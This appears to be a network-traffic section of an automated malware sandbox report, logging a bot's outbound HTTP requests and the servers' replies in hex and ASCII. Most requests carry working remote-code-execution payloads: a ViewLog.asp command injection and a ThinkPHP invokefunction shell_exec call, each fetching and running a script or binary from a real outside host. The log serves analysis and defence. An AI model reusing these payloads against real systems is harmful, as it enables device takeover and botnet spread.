                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.233491295.83.226.988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.092031956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.233405631.136.131.758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.106329918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:12.104033947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:14.051830053 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:17.955141068 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:25.890124083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.503983021 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.731579065 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.234093094.127.2.1778080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.109723091 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:11.429205894 CEST908INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 724
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 39 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.99</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.234474294.63.184.948080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.124634981 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:11.456753969 CEST548INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.235665894.120.57.308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.129466057 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.235430231.200.110.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.131799936 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.234880494.120.240.1838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.132006884 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.233837031.200.56.578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.133639097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.233910895.217.132.15580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.454596996 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:11.772931099 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:35:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.233738888.218.206.880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.461774111 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:21.784734964 CEST24INData Raw: 6f 32 4d 7a 74 5c 26 38 62 23 0d 0a
                                                        Data Ascii: o2Mzt\&8b#


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.233852894.123.89.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.462690115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.233725462.29.65.1828080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.464832067 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.234689494.120.54.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:11.468920946 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
